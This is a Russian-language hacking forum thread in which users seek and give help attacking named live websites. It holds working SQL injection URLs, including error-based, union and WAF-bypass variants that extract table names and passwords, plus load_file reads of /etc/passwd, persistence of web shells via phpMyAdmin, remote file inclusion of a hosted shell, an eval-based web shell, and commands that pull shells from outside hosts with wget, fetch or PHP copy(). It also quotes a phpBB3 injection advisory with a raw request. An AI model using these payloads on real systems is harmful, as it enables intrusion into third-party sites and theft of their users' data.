WendM said:
А что делает функция ExtractValue () ?


http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html#function_extractvalue

подобными вопросами в гугл, не флудим в теме

http://vk.com/id1'+union+select+1,2,3+--+

Подскажите как вывести все пароли? Что я делаю не так?

В sql бекапе нашел следующую запись

('3','dsamir','dGVzdDEyMzQ=','miroslav@forge.com.u a','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')

dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?

Я только начинаю курить..

Aplik said:
В sql бекапе нашел следующую запись
('3','dsamir','dGVzdDEyMzQ=','miroslav@forge.com.u a','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')
dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?
Я только начинаю курить..


Кодировка base64

Konqi said:
Кодировка base64


спасибо

жалко только пароль не подходит

такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так


insert into ib4.a values ('(SELECT load_file("/etc/passwd")')


чет вместо содержимого etc/passwd пишет его как строчку. как исправить?

qaz said:
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?


Пробовал просто вывести?


SELECT load_file("/etc/passwd")


С кавычками играл?

qaz said:
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?


епрст! ну сколько можно. когда наконец откроете гребанный учебник по MySQL?

все что внутри кавычек - называется строкой

вы пишите текст, потом удивляетесь

insert into tbl (`wtf`) values ((select load_file('/etc/passwd')))

Konqi said:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3a,version())))='1. html


Спасибо еще раз. Но дольше раскрутить не могу.

Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html

Но выдает ошибку 406. Что можно сделать?

WendM said:
Спасибо еще раз. Но дольше раскрутить не могу.
Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html
Но выдает ошибку 406. Что можно сделать?


лимит использовать

Expl0ited said:
лимит использовать


А как его заюзать без пробелов? limit(0,1) не проходит

Ребята как раскрутить дальше??


Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,version()+)+)+)='1

делал так


Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+)+)+)='1 ОБЛОМ.

и так


Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+limit+1,2+)+)+)='1 ОБЛОМ.

Так же не решен вопрос с этой скулей


Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html

Прошу показать хотя бы вывод table_name из INFORMATION_SCHEMA. Спасибо

Не нашел раздела с уязвимостями для Bitrix. Посоветуйте.

MaxFast said:
Не нашел раздела с уязвимостями для Bitrix. Посоветуйте.


Тут наверно _/thread58123.html

WendM said:
Ребята как раскрутить дальше??

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,version()+)+)+)='1

делал так

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+)+)+)='1 ОБЛОМ.

и так

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+limit+1,2+)+)+)='1 ОБЛОМ.

Так же не решен вопрос с этой скулей

Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html

Прошу показать хотя бы вывод table_name из INFORMATION_SCHEMA. Спасибо


Пользуйся)


http://www.muscletalk.ru/pharma.php?id=999999.9%27+or+%28+ExtractValue+%281 ,concat%280x3a,%28select+table_name+from+informati on_schema.tables+limit+0,1%29%29%29%29=%271

WendM said:
Ребята как раскрутить дальше??

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,version()+)+)+)='1

делал так

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+)+)+)='1 ОБЛОМ.

и так

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+limit+1,2+)+)+)='1 ОБЛОМ.

Так же не решен вопрос с этой скулей

Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html

Прошу показать хотя бы вывод table_name из INFORMATION_SCHEMA. Спасибо


WendM,

Держите решение Вашей проблемы:


Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+in+(select(@:=1)||@+from+( select+1+union+select+2+union+select+3)k+group+by+ concat(@@version,!@)having@||min(@:=0))+and+'1#

winstrool said:
Пользуйся)


Спасибо) Но такой вариант не проходит на


Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html

Тестирую на локалке метод залива шелла через sql inj.

Уязвимый php


PHP:
Новость №".$line['id']."
";

}

exit;

}

$query="SELECT text FROM news WHERE id= ".$_GET['id'];

$result=mysql_query($query);

print"";

while ($line=mysql_fetch_array($result,MY SQL_ASSOC)) {

print"";

foreach ($lineas$col_value) {

print"$col_value";

}

print"";

}

print"";

mysql_free_result($result);

mysql_close($link);



?>

Делаю запрос


Code:
http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql. user+where+user='root'+--+

Вылетают ошибки.

Делаю так


Code:
http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql. user+where+user=0x27726F6F7427+--+

Выводится First news

Что не так делаю?

Получилось залить шелл через phpmyadmin, но админы на серве постоянно переустанавливают свой серв и стирают мой шелл, даже иногда не устанавливают phpmyadmin, но вот седня снова они его установили я побырому залил шел во все щели но это не поможет после переустановки все снова слетит. Но база mysql она всегда таже, вот я и подумал можно ли создать там таблицу с этим кодом


PHP:
Click";} else {die("err");}}?>



И как то указать чтоб он автоматически его создавал по указанному адресу например раз в неделю или при его отсутствии. Помогите плииз.

dynda2000

http://video.antichat.ru/video/17/ прокатит?

Нашел дыру Nginx & PHP via FastCGI на member.my-addr.com. Хочется слить исходники многих их сервисов. Пример:


https://member.my-addr.com/robots.txt/run.php


Залить любой файл на сайт вроде никак. Есть варианты решения проблемы?

Описание дыры:

_http://cnedelcu.blogspot.com/2010/05/nginx-php-via-fastcgi-important.html

Konqi said:
я. подобные посты дальше будут удалятся. разбирайтесь сами. это не клуб помощи новичкам


Ваши вопросы по уязвимостям

По моему я в правильный раздел написал.

Ну не могу я получить количество стандартными grpoup by и order by, так же перебор через union select тоже не дает результата. Мануалы по sql inj молчат на этот случай.

Вопрос: " Можно ли получить количество полей при не работающих вариантах с grpoup by и order by. Если да, то как?" tnx!)

WendM said:
Ваши вопросы по уязвимостям
По моему я в правильный раздел написал.
Ну не могу я получить количество стандартными grpoup by и order by, так же перебор через union select тоже не дает результата. Мануалы по sql inj молчат на этот случай.
Вопрос: " Можно ли получить количество полей при не работающих вариантах с grpoup by и order by. Если да, то как?" tnx!)


Можно. Зависит от случая. И от WAF кстати тоже.

BigBear said:
Ну вот самый примитивный пример frame.
_ttp://www.prodisney.ru/index.php?page=http://rambler.ru
Это ну никак нельзя перепутать с RFI


LFI не получается найти - задолбался перебирать конструкции ../../etc/passwd, RFI паходу нет.

Но при запросе

_ttp://www.*********.ru/index.php?page=info.php успешно выводится содержимое инфо.пхп B frame

_ttp://www.********.ru/index.php?page=test.php также успешно выводится B frame на странице

September 5, 2004

/home/t*******1/public_html/sitenameАга

естьли возможность проинклюдить файл info.php или test.php как показано здесь (http://video.antichat.ru/video/34/)

и если да то как потом запустить всю эту конструкцию) если я никак не могу добраца до ../етс/пассвд или не обязательно вообще до него добираться?

или как это все осуществить.капец я запутался чета уже

mod_ said:
LFI не получается найти - задолбался перебирать конструкции ../../etc/passwd, RFI паходу нет.
Но при запросе
_ttp://www.*********.ru/index.php?page=info.php успешно выводится содержимое инфо.пхп B frame
_ttp://www.********.ru/index.php?page=test.php также успешно выводится B frame на странице
September 5, 2004
/home/t*******1/public_html/sitenameАга
естьли возможность проинклюдить файл info.php или test.php как показано
здесь (http://video.antichat.ru/video/34/)
и если да то как потом запустить всю эту конструкцию) если я никак не могу добраца до ../етс/пассвд или не обязательно вообще до него добираться?
или как это все осуществить.капец я запутался чета уже


Для заливки шелла через phpinfo();, тебе нужен LFI и доступ к tmp, если не можешь прочетать tmp, то не как. понятное дело ты можешь в сплоите поменять директории, но прав на запись тебе не кто не даст.

P.S. сплоит не будет работать, если phpinfo(), не создает глобальный массив $_FILES[]

Это LFI?

_http://web.fhnw.ch/technik/projekte/eit/Fruehling2011/JaegLoch/index.php?include=

Если да, то почему не получается получить etc/passwd

Cennarios said:
Первое: http://www.prodisney.ru/index.php?page=images/leftmenu5/back_0s.jpg
Второе:http://www.prodisney.ru/index.php?page=../prodisney/info.php
Третье:http://www.prodisney.ru/index.php?page=images/../images/leftmenu5/back_0s.jpg
Вывод: Выше корня выставленны соответствующие права, не дающие произвести желаемые операции.
Регистрируйся на форуме и проверяй зальется ли аватарка с сохранением php кода после ресайза.


Я пожалуй повторю:

/showpost.php?p=3308397&postcount=21440

Я не пойму это юмор какой-то ачатовский, или вы тут всегда так круто всё взламываете?

И взаправду. Чего стоило в базовый код страницы для начала посмотреть? Ты, мистер умник, как раз такой юморной, что только для тебя такие ответы и посты создаются. И во фразе - `Я пожалуй повторю`, после буквы Я ставится запятая.

да там одмин походу крякнул.уже 10 дней жду активации акка на этом пхпББ

mod_ said:
да там одмин походу крякнул.уже 10 дней жду активации акка на этом пхпББ


Не напрягайся =) Там тупой ифрейм. Це не инклуд позор на мои седины. http://www.prodisney.ru/articles/news1012.php?nid='3455&cat=n&f=1 Вот раскрытие путей, как бонус )

Как называется уязвимости такого рода?

_http://lavart.su/examples'

раскрытие путей=)

Собственно возникло 2 вопроса:

1) Имеется FCKeditor version 2.6.4.1 Build 23187, есть варианты залить shell?

2) Есть форма для загрузки картинок php спокойно грузит, но вот проблема в том что при просмотре выдает:

[CODE]
Code:
яШяаJFIF



яю>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality яЫC    $.' ",#(7),01444'9=82

_ttp:/thread314734.html

Ребят подскажите в чём проблемма?

Имеется RFI


Code:
http://www.basegroup.su/index.php?Page=

но когда подставляю ссыль на свой шелл,то всё выводит,но выполняет на моём серваке,а не на сайте.

Подскажите как решить проблемму?

Faaax said:
Ребят подскажите в чём проблемма?
Имеется RFI

Code:
http://www.basegroup.su/index.php?Page=

но когда подставляю ссыль на свой шелл,то всё выводит,но выполняет на моём серваке,а не на сайте.
Подскажите как решить проблемму?


1) Твой сервер не должен поддерживать php (narod.ya.ru идеален)

2) Шелл должен быть вида shell.txt

Удачи

P.S У меня все работает))!

мля запарил,что серв не должен поддерживать php(

да это знаю,просто запарил

WendM said:
1) Твой сервер не должен поддерживать php (narod.ya.ru идеален)


Не совсем так. Правильнее будет сказать, что сервер должен отдавать php в формате plain-text. А использовать narod.ru или положить в корень своего сайта .htaccess - ваше дело.

По сути подойдёт любой сторонний шелл и пара строчек в корне папки.

Совсем не обязательно иметь дело с narod.ru


WendM said:
2) Шелл должен быть вида shell.txt


Опять ошибочное суждение. Не важно расширение файла, так как при инклуде любой файл интерпретируется как PHP.

Важно, лишь чтобы файл не интерпретировался на дочернем сайте. Но об этом я писал выше.

хм всё равно не хочет

Faaax said:
хм всё равно не хочет


ну у меня то работает

не знаю чё такое у меня

ставлю http://www.basegroup.su/index.php?Page=site.narod.ru/shell.txt

просто пустая страница,а в исходнике код и всё

PHP:
eval($_REQUEST[c]);

такой вопросец, не очень знаком с файлами настройки хостинга, но можно както в etc/passwd или php.ini узнать путь к логам ошибок?

Пути к логам ошибок задаются в настройках apache в файле httpd.conf

распрастранненые пути файлов настроек сможешь посмотреть сдесь,


https://www.forum.antichat.ru/thread324564.html

Faaax said:
не знаю чё такое у меня
ставлю http://www.basegroup.su/index.php?Page=site.narod.ru/shell.txt
просто пустая страница,а в исходнике код и всё


Кэп подсказывает, что это не инклуд, а file_get_contents()

qaz said:
такой вопросец, не очень знаком с файлами настройки хостинга, но можно както в etc/passwd или php.ini узнать путь к логам ошибок?


В php.ini есть параметр "error_log", он указывает на путь к логам ошибок интерпритации, но как максимум это только FPD.

На хостингах обычно, что естественно, используются логически упорядоченные скелеты конфигураций хостов. Те , что-то вида: /serv/userXXX/conf/vhost.conf и подобное. Тупое спихивание конфигураций в httpd.conf или конфигов массово в папку а-ля sites-enabled способствует ухудшению удобства в настройке и использовании, а так-же не неверно сточки зрения изоляции уникального клиента. То-же касается и php.ini файла. Но это банальная схема для среднестатистического хостинга. Иные конфигурации используются в случаях если система не очень масштабна или следование логически верным построениям конфигурации системы не очень строги. Опять-же, излишняя унификация не столь необходима в случаях небольшого количества виртуальных хостов на сервере.

2Faaax залей на свой хост мини шелл и работай постом, все там робит.

как использовать эту уязвимость?

Nginx buffer underflow vulnerability

Вот читал про нее:

http://www.securelist.com/ru/advisories/36751

Хелп, нашел в одной игре)

http://elektri4ka.com/kino.php?info=270622&carcas=0

Кто сможет помочь?

Как организовать backconnect/bind при отключенных функциях php

exec,passthru,shell_exec,system,proc_open,popen?

Если можно, подробнее.

stan_q said:
Как организовать backconnect/bind при отключенных функциях php
exec,passthru,shell_exec,system,proc_open,popen?
Если можно, подробнее.


Какие еще оболочки присутствуют на серваке?

Попробуй залить Шеллы на перле,асп'е,ssi

На них уже ограничения не действуют

stan_q

оператор исполнения (http://php.net/manual/ru/language.operators.execution.php)

Здравствуйте, вопрос такой:


$size = getimagesize($_FILES[$formName]['tmp_name']);
$format = strtolower(substr($size['mime'], strpos($size['mime'], '/')+1));
move_uploaded_file($_FILES[$formName]['tmp_name'], $G_Settings["DIR_IMG"]."/{$G_Settings["IMG_NAMES"]}.{$format}")


Изображение заливается, и присваивается ему расширение исходя из Mime Type От getimagesize

Как обойти и чтобы назначилось php Значение?

blesse said:
Какие еще оболочки присутствуют на серваке?
Попробуй залить Шеллы на перле,асп'е,ssi
На них уже ограничения не действуют


Нету ничего, окромя пхп.

kroŧ


Обратные кавычки недоступны, в случае, если включен безопасный режим или отключена функция shell_exec().


У меня функция отключена

на друпал 5.23 есть уязвимость с мускулом?

такой вопрос. есть уязвимый сайт. мускул 5версия. не знаю префикс таблицы...

при инъекции


-235/**//*!union*//**//*!select*//**/version(),2,3/**//*!from*//**/--


все ок, т.е. вывод есть

но когда пытаюсь получить имена таблиц


PHP:
-235/**//*!union*//**//*!select*//**/group_concat(table_name),2,3/**//*!from*//**/information_schema.tables--

сайт ругается


Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, 4564646@6456456.456 and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log.


как вытащить имена ?

ukrpunk said:
такой вопрос. есть уязвимый сайт. мускул 5версия. не знаю префикс таблицы...
при инъекции
все ок, т.е. вывод есть
но когда пытаюсь получить имена таблиц

PHP:
-235/**//*!union*//**//*!select*//**/group_concat(table_name),2,3/**//*!from*//**/information_schema.tables--

сайт ругается
как вытащить имена ?


А unhex(hex('xyu')) попробовать?

Cennarios said:
А unhex(hex('xyu')) попробовать?


пробовал - ругается. попробовал вот так


unhex('7461626c655f6e616d65')


вывело тупо table_name,table_name,table_name

ukrpunk said:
пробовал - ругается. попробовал вот так
вывело тупо table_name,table_name,table_name


Начнем с того, что частенько фильтруется или для юзера нет прав на _schema.tables, быть может поможет что-то вида:

union select group_concat(table_name) from information_schema.columns where column_name like '%pass%' (или hex представление)

Always said:
http://elektri4ka.com/kino.php?info=270622&carcas=0
Кто сможет помочь?


Никто?

Always said:
Никто?


Это не SQLi.

помогите найти название таблицы .

view-source:http://www.clapwall onie.be/www/liste_ techniciens?&idfig=-512+or+1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1,2,3,4 ,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,31,table_name+F ROM+test--+

borntobebad said:
помогите найти название таблицы .
view-source:http://www.clapwall onie.be/www/liste_ techniciens?&idfig=-512+or+1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1,2,3,4 ,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,31,table_name+F ROM+test--+


_ttp://www.clapwallonie.be/www/liste_techniciens?&idfig=-512/**/and/**/1=2+union+select+1,null,null,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,table_name,25,26, 27,28,29,30,31,32+from+information_schema.tables+l imit+0,1+--+


Clap Wallonie : : CHARACTER_SETS

[CODE]
Code:
------------------------------------------------------------------
Name : phpBB3 SQL Injection
------------------------------------------------------------------
Date : 27.07.2012
------------------------------------------------------------------
Site : www.phpbb.com
------------------------------------------------------------------
Version : 3.0.10
------------------------------------------------------------------

1) What is it?
This is very nice forum board. You should try it!
------------------------------------------------------------------
2) Type of bug?
SQL Injection (or SQL-info-Leak if You want).
------------------------------------------------------------------
3) Where is the bug?
Vulnerable parameter seems to be 'style' because if we set up this parameter
to 'bigger number' (for example: 111111111) we will get an error, with full SQL
statement.

*updated - dateformat is the second vulnerable parameter!
*updated - post_st is the 3rd vulnerable parameter!
*updated - another one: topic_st


4) PoC traffic from Burp:
4.1) Request :

---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close

viewemail=1
&massemail=1
&allowpm=1
&hideonline=0
&notifypm=1
&popuppm=0
&lang=en
&style=%2b1111111111
&tz=0
&dst=0
&dateoptions=D+M+d%2C+Y+g%3Ai+a
&dateformat=D+M+d%2C+Y+g%3Ai+a
&submit=Submit
&creation_time=1343370877
&form_token=576...

---

4.2) Response:

---
HTTP/1.1 503 Service Unavailable
Date: Fri, 27 Jul 2012 06:39:06 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2889


Return to the index page

General Error
SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users
SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,
user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,
user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
WHERE user_id = 2

BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)

---


4.2 Other response (this time from post_st parameter):
---


Return to the index page


General Error
SQL ERROR [ mysqli ]

Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]

An SQL error occurred while fetching this page.
Please contact the

CoBecTb said:
Как воспользоваться данной инъекцией, так неразу ответа не получил, научите плз, заранее благодарю.


Для особо ленивых и не внимательных - маркирую цветом...


Code:
4.1) Request :

---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close

viewemail=1
&massemail=1
&allowpm=1
&hideonline=0
&notifypm=1
&popuppm=0
&lang=en
&style=%2b1111111111
&tz=0
&dst=0
&dateoptions=D+M+d%2C+Y+g%3Ai+a
&dateformat=D+M+d%2C+Y+g%3Ai+a
&submit=Submit
&creation_time=1343370877
&form_token=576...

---

4.2) Response:

---
HTTP/1.1 503 Service Unavailable
Date: Fri, 27 Jul 2012 06:39:06 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2889


Return to the index page

General Error
SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users
SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,
user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,
user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
WHERE user_id = 2


BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)

BigBear said:
Для особо ленивых и не внимательных - маркирую
цветом
...

Code:
4.1) Request :

---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close

viewemail=1
&massemail=1
&allowpm=1
&hideonline=0
&notifypm=1
&popuppm=0
&lang=en
&style=%2b1111111111
&tz=0
&dst=0
&dateoptions=D+M+d%2C+Y+g%3Ai+a
&dateformat=D+M+d%2C+Y+g%3Ai+a
&submit=Submit
&creation_time=1343370877
&form_token=576...

---

4.2) Response:

---
HTTP/1.1 503 Service Unavailable
Date: Fri, 27 Jul 2012 06:39:06 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2889


Return to the index page

General Error
SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users
SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,
user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,
user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
WHERE user_id = 2


BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)



Большое спасибо за подсказку, но как мне её запустить. пробовал через wappex ничего не выходит. Заранее благодарю.

news.php?id=0 union select 1,2,3,4,5,6,7,8,9 from information_schema.tables - ok

news.php?id=0 union select 1,2,3,4,5,6,7,8,table_name from information_schema.tables - новость не существует

как можно обойти?

vaddd said:
news.php?id=0 union select 1,2,3,4,5,6,7,8,9 from information_schema.tables - ok
news.php?id=0 union select 1,2,3,4,5,6,7,8,table_name from information_schema.tables - новость не существует
как можно обойти?


news.php?id=0 and 1=2 union select 1,2,3,4,5,6,7,8,table_name from information_schema.tables limit 0,1

BigBear said:
news.php?id=0 and 1=2 union select 1,2,3,4,5,6,7,8,table_name from information_schema.tables limit 0,1


тоже самое...

news.php?id=0 union select 1,2,3,4,5,6,7,8,group_concat(%74able_name) from information_schema.tables

Так попробуй,а лучше выложи ссыль.

BigBear said:
Для особо ленивых и не внимательных - маркирую
цветом
...


Извините плз, возможно ли реализовать эту инъекцию через wappex?

Если да, то объясните в 2х словах или подробно если не сложно.

Ещё раз извиняюсь за назойливость.

kingbeef said:
news.php?id=0 union select 1,2,3,4,5,6,7,8,group_concat(%74able_name) from information_schema.tables
Так попробуй,а лучше выложи ссыль.


http://www.artsnspirits.com/quick-signup.php?eventid=0%20union%20select%201,2,3,4,5, 6,7,8,9

принтабльный парметр - 6

vaddd said:
http://www.artsnspirits.com/quick-signup.php?eventid=0%20union%20select%201,2,3,4,5, 6,7,8,9
принтабльный парметр - 6



http://www.artsnspirits.com/quick-signup.php?eventid=0+union+select+1,2,3,4,5,hex(ta ble_name),7,8,9+from+information_schema.tables+lim it+16,1--+

Дальше сам.

Раскрутил, спасибо всем кто откликнулся.

id=(1)and(select 1 from(select count(*),concat((SELECT user_password from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--

Subquery returns more than 1 row

В чем трабл? имена колонок и таблиц таким способом узнал, а данные не извлекаются

vaddd said:
id=(1)and(select 1 from(select count(*),concat((SELECT user_password from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--
Subquery returns more than 1 row
В чем трабл? имена колонок и таблиц таким способом узнал, а данные не извлекаются




PHP:
id=(1)and(select 1 from(select count(*),concat( (SELECT substr(user_password,1,99)from users li mit 0,1),floor(rand(0)*2))x from information_sc hema.tables group by x)a)--

qaz said:
такой вопросец есть шелл, права не очень полные, движок ворд пресс, немогу редачить морду, зато могу редачить все остальные файлы а также файлы в папка wp-includes ] wp-admin ] script ] куда можно влепить свой код чтобы он отобразился на главной??? уже что не перепробывал ничего не выходит


Можно отредактировать шаблон

Можно в папке wp-includes полазить и посмотреть какие из них инклудятся на главную страницу, и отредактировать его

пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?

такие команды выполняються

system('ls -la');

system('rmdir hack');

system('mkdir hack');

system('id');

а вот

system('wget http://goomihas.narod.ru/testing.php')

Sat-hacker said:
пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?
такие команды выполняються
system('ls -la');
system('rmdir hack');
system('mkdir hack');
system('id');
а вот
system('wget http://goomihas.narod.ru/testing.php')


воспользуйся пхп функцией copy();

пример:


PHP:
copy("http://localhost/shell.txt","tmp/shell.php");

Sat-hacker said:
пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?
такие команды выполняються
system('ls -la');
system('rmdir hack');
system('mkdir hack');
system('id');
а вот
system('wget http://goomihas.narod.ru/testing.php')


слабо читать учебник по linux?

кури маны curl,wget,lynx, если система BSD то (fetch)

Спасибо.Параметр fetch помог.Konqi где можна скачать хорошие маны?

Sat-hacker said:
Спасибо.Параметр fetch помог.Konqi где можна скачать хорошие маны?


в гугле

Помогите со скулей, никак не получается из-за WAF

http://www.paladins.ru/deskart.php?cat=4&conk=-1

intertrey said:
Отснифал havij, к примеру такие запросы посылает
http://site/ambassadors/event.php?id=939
http://site/ambassadors/event.php?id=999999.9
http://site/ambassadors/event.php?id=939 and 1=1
http://site/ambassadors/event.php?id=939 and 1>1
http://site/ambassadors/event.php?id=939 and 1=1
http://site/ambassadors/event.php?id=939'
http://site/ambassadors/event.php?id=/*!30000 939*/
